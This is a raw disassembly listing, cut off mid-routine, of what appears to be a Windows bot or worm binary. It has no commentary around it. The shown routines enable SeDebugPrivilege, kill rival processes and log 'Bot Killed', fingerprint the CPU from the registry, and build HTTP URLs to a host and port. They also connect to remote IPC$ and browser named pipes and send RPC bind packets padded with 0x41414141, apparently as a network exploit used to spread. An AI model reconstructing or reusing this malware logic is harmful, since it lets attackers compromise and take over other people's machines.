loc_419E92: ; CODE XREF: sub_419E55+2B�j
call sub_419C6D
loc_419E97: ; CODE XREF: sub_419E55+3B�j
pop ecx
mov al, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419E9C: ; CODE XREF: sub_419E55+10�j
xor al, al
pop ebp
retn
sub_419E55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EA0 proc near ; DATA XREF: J8@F_7_S:0041BF57�o
var_569 = byte ptr -569h
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = dword ptr -55Ch
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_540 = dword ptr -540h
var_524 = byte ptr -524h
var_420 = byte ptr -420h
var_318 = byte ptr -318h
var_317 = byte ptr -317h
var_210 = byte ptr -210h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 56Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+56Ch+var_4], eax
push ebx
push esi
push edi
xor ebx, ebx
push 103h
lea eax, [esp+57Ch+var_317]
push ebx
push eax
mov [esp+584h+var_318], bl
call sub_407B70
add esp, 0Ch
mov [esp+578h+var_558], offset dword_420744
mov [esp+578h+var_554], offset dword_420754
mov [esp+578h+var_550], offset dword_420760
call sub_402AE8
mov edi, ds:dword_41D0E4
push offset aOpenthread ; "OpenThread"
push offset aKernel32_dll_0 ; "kernel32.dll"
mov [esp+580h+var_54C], eax
call edi
mov esi, ds:dword_41D0EC
push eax
call esi
push offset aOpenprocess ; "OpenProcess"
push offset aKernel32_dll_1 ; "kernel32.dll"
mov ds:dword_426580, eax
call edi
push eax
call esi
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push offset aKernel32_dll_2 ; "kernel32.dll"
mov ds:dword_42658C, eax
call edi
push eax
call esi
push offset aProcess32first ; "Process32First"
push offset aKernel32_dll_3 ; "kernel32.dll"
mov ds:dword_426574, eax
call edi
push eax
call esi
push offset aProcess32next ; "Process32Next"
push offset aKernel32_dll_4 ; "kernel32.dll"
mov ds:dword_426578, eax
call edi
push eax
call esi
push offset aModule32first ; "Module32First"
push offset aKernel32_dll_5 ; "kernel32.dll"
mov ds:dword_42657C, eax
call edi
push eax
call esi
push offset aModule32next ; "Module32Next"
push offset aKernel32_dll_6 ; "kernel32.dll"
mov ds:dword_426568, eax
call edi
push eax
call esi
push offset aThread32first ; "Thread32First"
push offset aKernel32_dll_7 ; "kernel32.dll"
mov ds:dword_426584, eax
call edi
push eax
call esi
push offset aThread32next ; "Thread32Next"
push offset aKernel32_dll_8 ; "kernel32.dll"
mov ds:dword_42656C, eax
call edi
push eax
call esi
push offset aReadprocessmem ; "ReadProcessMemory"
push offset aKernel32_dll_9 ; "kernel32.dll"
mov ds:dword_426590, eax
call edi
push eax
call esi
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push offset aPsapi_dll ; "psapi.dll"
mov ds:dword_426570, eax
call ds:dword_41D0E8
push eax
call esi
cmp ds:dword_426580, ebx
mov ds:dword_426588, eax
jz loc_41A36B
cmp ds:dword_42658C, ebx
jz loc_41A36B
cmp ds:dword_426574, ebx
jz loc_41A36B
cmp ds:dword_426578, ebx
jz loc_41A36B
cmp ds:dword_42657C, ebx
jz loc_41A36B
cmp ds:dword_426568, ebx
jz loc_41A36B
cmp ds:dword_426584, ebx
jz loc_41A36B
cmp ds:dword_42656C, ebx
jz loc_41A36B
cmp ds:dword_426590, ebx
jz loc_41A36B
cmp ds:dword_426570, ebx
jz loc_41A36B
cmp eax, ebx
jz loc_41A36B
mov edi, 104h
push edi
lea eax, [esp+57Ch+var_318]
push eax
call ds:dword_41D0F4
lea eax, [esp+578h+var_558]
xor esi, esi
mov [esp+578h+var_568], eax
loc_41A087: ; CODE XREF: sub_419EA0+238�j
mov ecx, [esp+578h+var_568]
push dword ptr [ecx]
lea ecx, [esp+57Ch+var_318]
push ecx
push offset aSS_2 ; "%s\\%s"
lea eax, [esp+esi+584h+var_210]
push 103h
push eax
call sub_402AEE
lea eax, [esp+esi+58Ch+var_210]
add esp, 14h
lea ecx, [eax+1]
loc_41A0B9: ; CODE XREF: sub_419EA0+21E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41A0B9
add [esp+578h+var_568], 4
sub eax, ecx
add eax, esi
add esi, edi
cmp esi, 30Ch
mov [esp+eax+578h+var_210], bl
jb short loc_41A087
loc_41A0DA: ; CODE XREF: sub_419EA0+4C6�j
push ebx
push 0Fh
mov [esp+580h+var_548], 128h
call ds:dword_426574
lea ecx, [esp+578h+var_548]
push ecx
push eax
mov [esp+580h+var_55C], eax
call ds:dword_426578
test eax, eax
jz loc_41A35B
jmp loc_41A344
; ---------------------------------------------------------------------------
loc_41A108: ; CODE XREF: sub_419EA0+4B5�j
mov edi, ds:dword_41D104
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
mov [esp+584h+var_569], 1
call edi
mov esi, ds:dword_41D038
push eax
call esi
test eax, eax
jnz short loc_41A15C
call ds:dword_41D0F0
cmp eax, 3F0h
jnz short loc_41A158
push 2
call ds:dword_41D030
test eax, eax
jnz short loc_41A147
mov [esp+578h+var_569], bl
loc_41A147: ; CODE XREF: sub_419EA0+2A1�j
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
call edi
push eax
call esi
test eax, eax
jnz short loc_41A15C
loc_41A158: ; CODE XREF: sub_419EA0+295�j
mov [esp+578h+var_569], bl
loc_41A15C: ; CODE XREF: sub_419EA0+288�j
; sub_419EA0+2B6�j
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
add esp, 0Ch
test al, al
jnz short loc_41A181
push [esp+578h+var_564]
call ds:dword_41D0DC
mov [esp+578h+var_569], bl
loc_41A181: ; CODE XREF: sub_419EA0+2D1�j
push [esp+578h+var_540]
push ebx
push 1F0FFFh
call ds:dword_42658C
cmp eax, ebx
mov [esp+578h+var_568], eax
jnz short loc_41A19D
mov [esp+578h+var_569], bl
loc_41A19D: ; CODE XREF: sub_419EA0+2F7�j
mov esi, 104h
push esi
lea eax, [esp+57Ch+var_420]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+57Ch+var_420]
push eax
push ebx
push [esp+584h+var_568]
call ds:dword_426588
mov [esp+578h+var_560], ebx
lea edi, [esp+578h+var_210]
loc_41A1D3: ; CODE XREF: sub_419EA0+352�j
lea eax, [esp+578h+var_420]
push eax
push edi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41A1F6
inc [esp+578h+var_560]
add edi, esi
cmp [esp+578h+var_560], 3
jb short loc_41A1D3
jmp short loc_41A1FA
; ---------------------------------------------------------------------------
loc_41A1F6: ; CODE XREF: sub_419EA0+345�j
mov [esp+578h+var_569], bl
loc_41A1FA: ; CODE XREF: sub_419EA0+354�j
cmp [esp+578h+var_569], bl
jz loc_41A32A
push ebx
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
xor eax, eax
lea edi, [esp+584h+var_558]
stosd
stosd
mov eax, [esp+584h+var_54C]
add esp, 0Ch
cmp [esp+578h+var_540], eax
jz loc_41A32A
lea eax, [esp+578h+var_524]
push offset aSystem ; "System"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz loc_41A32A
mov esi, [esp+578h+var_540]
push ebx
push 4
call ds:dword_426574
cmp eax, 0FFFFFFFFh
jz loc_41A32A
push eax
push esi
call sub_4199AC
cmp al, bl
pop ecx
pop ecx
jz loc_41A32A
push [esp+578h+var_540]
lea esi, [esp+57Ch+var_558]
call sub_419A10
test al, al
pop ecx
jz loc_41A30F
push [esp+578h+var_554]
call sub_402648
cmp eax, ebx
pop ecx
jnz short loc_41A293
push ebx
jmp short loc_41A309
; ---------------------------------------------------------------------------
loc_41A293: ; CODE XREF: sub_419EA0+3EE�j
push eax
push [esp+57Ch+var_554]
push [esp+580h+var_558]
push [esp+584h+var_568]
call sub_4198D2
add esp, 10h
cmp al, bl
jz short loc_41A30F
push 100h
call sub_402648
pop ecx
mov esi, eax
lea eax, [esp+578h+var_524]
push eax
lea eax, [esp+57Ch+var_420]
push eax
push [esp+580h+var_568]
call sub_419E55
add esp, 0Ch
test al, al
jz short loc_41A308
push esi
call sub_402A45
pop ecx
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
lea eax, [esp+578h+var_420]
push eax
push offset aBotKilledS ; "Bot Killed: %s"
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 14h
xor ebx, ebx
loc_41A308: ; CODE XREF: sub_419EA0+434�j
push esi
loc_41A309: ; CODE XREF: sub_419EA0+3F1�j
call sub_402B9B
pop ecx
loc_41A30F: ; CODE XREF: sub_419EA0+3DC�j
; sub_419EA0+40A�j
mov esi, [esp+578h+var_540]
push ebx
push 4
call ds:dword_426574
cmp eax, 0FFFFFFFFh
jz short loc_41A32A
push eax
push esi
call sub_419948
pop ecx
pop ecx
loc_41A32A: ; CODE XREF: sub_419EA0+35E�j
; sub_419EA0+386�j ...
push [esp+578h+var_564]
mov esi, ds:dword_41D0DC
call esi
push [esp+578h+var_568]
call esi
push 1
call ds:dword_41D0FC
loc_41A344: ; CODE XREF: sub_419EA0+263�j
lea eax, [esp+578h+var_548]
push eax
push [esp+57Ch+var_55C]
call ds:dword_42657C
test eax, eax
jnz loc_41A108
loc_41A35B: ; CODE XREF: sub_419EA0+25D�j
push 927C0h
call ds:dword_41D0FC
jmp loc_41A0DA
; ---------------------------------------------------------------------------
loc_41A36B: ; CODE XREF: sub_419EA0+14F�j
; sub_419EA0+15B�j ...
call ds:dword_41D0E0
push eax
call sub_414042
pop ecx
mov ecx, [esp+578h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_419EA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C4h
sub_41A391 proc near ; CODE XREF: sub_401CC0+E0�p
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_335 = byte ptr -335h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2C4h]
sub esp, 344h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2C4h+var_4], eax
push ebx
push esi
push edi
push 0Bh
pop ecx
mov esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
lea edi, [ebp+2C4h+var_34]
rep movsd
movsw
mov ebx, 100h
movsb
push ebx
xor esi, esi
lea eax, [ebp+2C4h+var_334]
push esi
push eax
call sub_407B70
push 4
push offset dword_426BE8
push offset aMhz ; "~MHz"
lea eax, [ebp+2C4h+var_34]
push eax
push 4
call sub_416ECD
add esp, 20h
test al, al
jz loc_41A5A9
push ebx
lea eax, [ebp+2C4h+var_334]
push eax
push offset aProcessornames ; "ProcessorNameString"
lea eax, [ebp+2C4h+var_34]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz loc_41A4E9
mov edi, 0FFh
push edi
lea eax, [ebp+2C4h+var_133]
push esi
push eax
mov [ebp+2C4h+var_335], 0
mov [ebp+2C4h+var_134], 0
call sub_407B70
lea eax, [ebp+2C4h+var_334]
push eax
push offset aS_7 ; "%s"
lea eax, [ebp+2C4h+var_134]
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_134]
add esp, 1Ch
lea esi, [eax+1]
loc_41A45C: ; CODE XREF: sub_41A391+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A45C
sub eax, esi
push ebx
push 0
mov esi, offset byte_426AE8
push esi
mov [ebp+eax+2C4h+var_134], cl
call sub_407B70
add esp, 0Ch
xor ecx, ecx
mov [ebp+2C4h+var_33C], ecx
loc_41A482: ; CODE XREF: sub_41A391+154�j
cmp [ebp+2C4h+var_335], 0
jnz short loc_41A499
cmp [ebp+ecx+2C4h+var_134], 20h
jz short loc_41A4C9
mov [ebp+2C4h+var_335], 1
dec ecx
jmp short loc_41A4C9
; ---------------------------------------------------------------------------
loc_41A499: ; CODE XREF: sub_41A391+F5�j
movsx eax, [ebp+ecx+2C4h+var_134]
push eax
push esi
push offset aSC_0 ; "%s%c"
push edi
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41A4B7: ; CODE XREF: sub_41A391+12B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4B7
sub eax, ecx
mov ecx, [ebp+2C4h+var_33C]
mov ds:byte_426AE8[eax], dl
loc_41A4C9: ; CODE XREF: sub_41A391+FF�j
; sub_41A391+106�j
lea eax, [ebp+2C4h+var_134]
inc ecx
lea edx, [eax+1]
mov [ebp+2C4h+var_33C], ecx
mov [ebp+2C4h+var_344], edx
loc_41A4D9: ; CODE XREF: sub_41A391+14D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4D9
sub eax, [ebp+2C4h+var_344]
cmp ecx, eax
jbe short loc_41A482
jmp short loc_41A51C
; ---------------------------------------------------------------------------
loc_41A4E9: ; CODE XREF: sub_41A391+85�j
push ebx
push esi
mov esi, offset byte_426AE8
push esi
call sub_407B70
push offset aUnknown ; "Unknown"
mov edi, 0FFh
push edi
push esi
call sub_402AEE
add esp, 18h
lea eax, [esi+1]
loc_41A50D: ; CODE XREF: sub_41A391+181�j
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41A50D
sub esi, eax
mov ds:byte_426AE8[esi], cl
loc_41A51C: ; CODE XREF: sub_41A391+156�j
and ds:dword_426BEC, 0
mov [ebp+2C4h+var_33C], 1
loc_41A52A: ; CODE XREF: sub_41A391+20D�j
inc ds:dword_426BEC
push ebx
lea eax, [ebp+2C4h+var_234]
push 0
push eax
call sub_407B70
push [ebp+2C4h+var_33C]
lea eax, [ebp+2C4h+var_234]
push offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_234]
add esp, 1Ch
lea esi, [eax+1]
loc_41A560: ; CODE XREF: sub_41A391+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A560
sub eax, esi
mov [ebp+eax+2C4h+var_234], cl
lea eax, [ebp+2C4h+var_340]
push eax
push 1
push 0
lea eax, [ebp+2C4h+var_234]
push eax
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz short loc_41A5A0
push [ebp+2C4h+var_340]
call ds:dword_41D010
inc [ebp+2C4h+var_33C]
cmp [ebp+2C4h+var_33C], 8
jb short loc_41A52A
loc_41A5A0: ; CODE XREF: sub_41A391+1FB�j
push [ebp+2C4h+var_340]
call ds:dword_41D010
loc_41A5A9: ; CODE XREF: sub_41A391+62�j
mov ecx, [ebp+2C4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 2C4h
leave
retn
sub_41A391 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5C1 proc near ; CODE XREF: sub_41A8D5+B7�p
var_518 = dword ptr -518h
var_508 = dword ptr -508h
var_504 = byte ptr -504h
var_501 = byte ptr -501h
var_390 = byte ptr -390h
var_38D = byte ptr -38Dh
var_21C = byte ptr -21Ch
var_21B = byte ptr -21Bh
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 508h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_508], eax
mov eax, ds:dword_41EF64
mov [ebp+var_C], eax
mov eax, ds:dword_41EF68
mov esi, offset dword_41EF6C
lea edi, [ebp+var_504]
mov ebx, 16Fh
movsw
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_501]
push 0
push eax
movsb
call sub_407B70
mov esi, offset dword_41EF70
lea edi, [ebp+var_390]
movsw
movsb
push ebx
xor esi, esi
lea eax, [ebp+var_38D]
push esi
push eax
call sub_407B70
xor eax, eax
mov [ebp+var_1C], 0
lea edi, [ebp+var_1B]
stosd
stosd
stosd
stosw
stosb
mov edi, 0FFh
push edi
lea eax, [ebp+var_21B]
push esi
push eax
mov [ebp+var_21C], 0
call sub_407B70
push edi
lea eax, [ebp+var_11B]
push esi
push eax
mov [ebp+var_11C], 0
call sub_407B70
add esp, 30h
cmp [ebp+arg_4], 0
jz short loc_41A6F1
call sub_419347
test al, al
jnz short loc_41A6D9
push ds:dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A6D0: ; CODE XREF: sub_41A5C1+114�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A6D0
jmp short loc_41A748
; ---------------------------------------------------------------------------
loc_41A6D9: ; CODE XREF: sub_41A5C1+BD�j
push 100h
lea esi, [ebp+var_11C]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41A752
; ---------------------------------------------------------------------------
loc_41A6F1: ; CODE XREF: sub_41A5C1+B4�j
push ds:dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS_0 ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A741: ; CODE XREF: sub_41A5C1+185�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A741
loc_41A748: ; CODE XREF: sub_41A5C1+116�j
sub eax, edx
mov [ebp+eax+var_11C], 0
loc_41A752: ; CODE XREF: sub_41A5C1+12E�j
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_504]
push eax
call sub_41432A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_41A774
loc_41A76D: ; CODE XREF: sub_41A5C1+1EB�j
xor eax, eax
jmp loc_41A8C6
; ---------------------------------------------------------------------------
loc_41A774: ; CODE XREF: sub_41A5C1+1AA�j
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
lea ebx, [ebp+var_390]
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41A7AE
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz short loc_41A76D
loc_41A7AE: ; CODE XREF: sub_41A5C1+1D1�j
mov ebx, [ebp+var_508]
push 9
pop ecx
xor eax, eax
mov edi, ebx
stosd
push 0FFh
lea eax, [ebx+24h]
push 61h
mov esi, offset dword_4245DC
mov edi, ebx
push eax
rep movsd
call sub_407B70
mov esi, 101h
push esi
lea eax, [ebx+123h]
push 62h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+224h]
push esi
stosw
lea eax, [ebx+226h]
push 22h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+327h]
stosw
lea edi, [ebx+42Ah]
add esp, 24h
and [ebp+var_8], 0
mov [ebp+var_508], edi
jmp short loc_41A82D
; ---------------------------------------------------------------------------
loc_41A827: ; CODE XREF: sub_41A5C1+29B�j
mov edi, [ebp+var_508]
loc_41A82D: ; CODE XREF: sub_41A5C1+264�j
mov eax, [ebp+var_8]
add eax, 64h
push esi
push eax
lea eax, [edi-101h]
push eax
call sub_407B70
add [ebp+var_508], 103h
add esp, 0Ch
inc [ebp+var_8]
cmp [ebp+var_8], 8
mov eax, 1010101h
stosw
jl short loc_41A827
push 9
pop ecx
mov eax, 6C6C6C6Ch
lea edi, [ebx+0B41h]
rep stosd
stosb
lea edi, [ebx+0B66h]
mov esi, offset dword_424604
movsd
movsd
lea eax, [ebp+var_390]
movsw
mov esi, ds:dword_41D0A4
push eax
call esi
push eax
lea eax, [ebp+var_390]
push eax
lea eax, [ebx+0B70h]
push eax
call sub_407BF0
add esp, 0Ch
push 54Ah
push 6Dh
lea eax, [ebp+var_390]
push eax
call esi
lea eax, [eax+ebx+0B70h]
push eax
call sub_407B70
add esp, 0Ch
mov eax, ebx
loc_41A8C6: ; CODE XREF: sub_41A5C1+1AE�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_41A5C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=12BCh
sub_41A8D5 proc near ; DATA XREF: J8@F_7_S:004245A8�o
var_133C = byte ptr -133Ch
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1234 = dword ptr -1234h
var_122F = dword ptr -122Fh
var_1228 = word ptr -1228h
var_1226 = word ptr -1226h
var_1224 = dword ptr -1224h
var_1218 = byte ptr -1218h
var_1217 = byte ptr -1217h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-12BCh]
mov eax, 133Ch
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+12BCh+var_4], eax
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+12BCh+arg_0]
lea edi, [ebp+12BCh+var_133C]
rep movsd
mov esi, 1211h
push esi
lea eax, [ebp+12BCh+var_1217]
push 0
push eax
mov [ebp+12BCh+var_1218], 0
call sub_407B70
mov eax, [ebp+12BCh+var_1238]
add esp, 0Ch
push [ebp+12BCh+var_1234]
mov [ebp+12BCh+var_1228], 2
mov [ebp+12BCh+var_1224], eax
call ds:dword_41D278
push 6
push 1
push 2
mov [ebp+12BCh+var_1226], ax
call ds:dword_41D27C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41A961
loc_41A95D: ; CODE XREF: sub_41A8D5+A8�j
xor al, al
jmp short loc_41A9C7
; ---------------------------------------------------------------------------
loc_41A961: ; CODE XREF: sub_41A8D5+86�j
push 10h
lea eax, [ebp+12BCh+var_1228]
push eax
push edi
call ds:dword_41D240
cmp eax, 0FFFFFFFFh
jnz short loc_41A97F
loc_41A976: ; CODE XREF: sub_41A8D5+C0�j
push edi
loc_41A977: ; CODE XREF: sub_41A8D5+D7�j
call ds:dword_41D224
jmp short loc_41A95D
; ---------------------------------------------------------------------------
loc_41A97F: ; CODE XREF: sub_41A8D5+9F�j
push [ebp+12BCh+var_122F]
lea eax, [ebp+12BCh+var_1218]
push eax
call sub_41A5C1
test eax, eax
pop ecx
pop ecx
jz short loc_41A976
push 0
push esi
lea eax, [ebp+12BCh+var_1218]
push eax
push edi
call ds:dword_41D228
cmp eax, 0FFFFFFFFh
push edi
jz short loc_41A977
call ds:dword_41D224
mov eax, [ebp+12BCh+var_123C]
imul eax, 2Ch
lea eax, dword_42454C[eax]
inc dword ptr [eax]
mov al, 1
loc_41A9C7: ; CODE XREF: sub_41A8D5+8A�j
mov ecx, [ebp+12BCh+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 12BCh
leave
retn
sub_41A8D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9DE proc near ; CODE XREF: J8@F_7_S:00413C39�p
; J8@F_7_S:00413D4A�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_3C = dword ptr 44h
arg_40 = byte ptr 48h
arg_4C = dword ptr 54h
arg_50 = byte ptr 58h
arg_54 = byte ptr 5Ch
arg_68 = dword ptr 70h
arg_78 = dword ptr 80h
arg_7C = word ptr 84h
arg_80 = dword ptr 88h
arg_84 = word ptr 8Ch
arg_88 = dword ptr 90h
arg_8C = dword ptr 94h
arg_90 = word ptr 98h
arg_94 = byte ptr 9Ch
arg_98 = dword ptr 0A0h
arg_9C = dword ptr 0A4h
arg_A0 = dword ptr 0A8h
arg_A4 = dword ptr 0ACh
arg_A8 = byte ptr 0B0h
arg_AC = word ptr 0B4h
arg_AE = word ptr 0B6h
arg_B0 = dword ptr 0B8h
arg_B4 = word ptr 0BCh
arg_B6 = word ptr 0BEh
arg_B8 = dword ptr 0C0h
arg_BC = dword ptr 0C4h
arg_C0 = word ptr 0C8h
arg_C2 = byte ptr 0CAh
arg_C4 = byte ptr 0CCh
arg_D4 = dword ptr 0DCh
arg_D8 = byte ptr 0E0h
arg_E8 = dword ptr 0F0h
arg_EC = byte ptr 0F4h
arg_1EC = dword ptr 1F4h
arg_1F0 = dword ptr 1F8h
arg_1F8 = dword ptr 200h
arg_1FD = byte ptr 205h
arg_200 = byte ptr 208h
arg_201 = byte ptr 209h
arg_210 = byte ptr 218h
arg_211 = byte ptr 219h
arg_310 = byte ptr 318h
arg_311 = byte ptr 319h
arg_40C = byte ptr 414h
arg_240C = byte ptr 2414h
arg_4410 = byte ptr 4418h
arg_6410 = dword ptr 6418h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 641Ch
call sub_411400
mov eax, ds:dword_423064
xor eax, esp
mov [esp+arg_6410], eax
push ebx
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+arg_0]
lea edi, [esp+0Ch+arg_EC]
rep movsd
mov eax, [esp+0Ch+arg_1F0]
push eax
mov [esp+10h+arg_20], eax
call ds:dword_41D260
xor ebx, ebx
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_4], ebx
loc_41AA2A: ; CODE XREF: sub_41A9DE+722�j
cmp [esp+0Ch+arg_4], 2
ja loc_41B10F
push offset a_ ; "."
push [esp+10h+arg_C]
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41AA9D
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_40C]
push offset aSIpc ; "\\\\%s\\ipc$"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push 8
pop ecx
xor eax, eax
push ebx
lea edi, [esp+10h+arg_54]
rep stosd
lea eax, [esp+10h+arg_40C]
push offset byte_41EEEE
mov [esp+14h+arg_68], eax
push offset byte_41EEEF
lea eax, [esp+18h+arg_54]
push eax
call sub_402642
test eax, eax
jnz loc_41B10F
loc_41AA9D: ; CODE XREF: sub_41A9DE+69�j
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_240C]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
lea eax, [esp+24h+arg_240C]
push eax
call ds:dword_41D06C
cmp eax, 0FFFFFFFFh
mov [esp+10h], eax
jz loc_41B10F
push 48h
lea eax, [esp+10h+arg_A4]
push ebx
push eax
call sub_407B70
mov byte ptr [esp+18h+arg_A4], 5
mov byte ptr [esp+18h+arg_A4+1], bl
mov byte ptr [esp+18h+arg_A4+2], 0Bh
mov byte ptr [esp+18h+arg_A4+3], 3
mov dword ptr [esp+18h+arg_A8], 10h
mov [esp+18h+arg_AC], 48h
mov [esp+18h+arg_AE], bx
mov [esp+18h+arg_B0], ebx
mov [esp+18h+arg_B4], 10B8h
mov [esp+18h+arg_B6], 10B8h
mov [esp+18h+arg_B8], ebx
mov [esp+18h+arg_BC], 1
mov [esp+18h+arg_C0], bx
mov [esp+18h+arg_C2], 1
mov esi, offset dword_41F02C
lea edi, [esp+18h+arg_C4]
movsd
movsd
movsd
movsd
mov [esp+18h+arg_D4], 3
mov esi, offset dword_41F040
lea edi, [esp+18h+arg_D8]
movsd
movsd
add esp, 0Ch
movsd
push 2
movsd
pop esi
push ebx
lea eax, [esp+10h+arg_50]
push eax
push 48h
lea eax, [esp+18h+arg_A4]
push eax
push dword ptr [esp+20h]
mov [esp+20h+arg_E8], esi
call ds:dword_41D088
test eax, eax
jz loc_41B105
push ebx
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078
call ds:dword_41D108
push eax
call sub_403356
mov edx, 41414141h
mov eax, edx
lea edi, [esp+0Ch+arg_94]
stosd
stosd
stosd
stosd
pop ecx
stosd
push 7
pop ecx
mov eax, edx
lea edi, [esp+8+arg_78]
rep stosd
call sub_403363
mov dword ptr [esp+8+arg_94], eax
xor eax, eax
inc eax
cmp [esp+8+arg_8], eax
mov [esp+8+arg_A0], eax
mov [esp+8+arg_9C], ebx
mov [esp+8+arg_98], eax
mov word ptr [esp+8+arg_A4], bx
jnz short loc_41AC5D
mov dword ptr [esp+8+arg_84], eax
mov dword ptr [esp+8+arg_7C], eax
mov [esp+8+arg_88], ebx
jmp short loc_41AC7C
; ---------------------------------------------------------------------------
loc_41AC5D: ; CODE XREF: sub_41A9DE+266�j
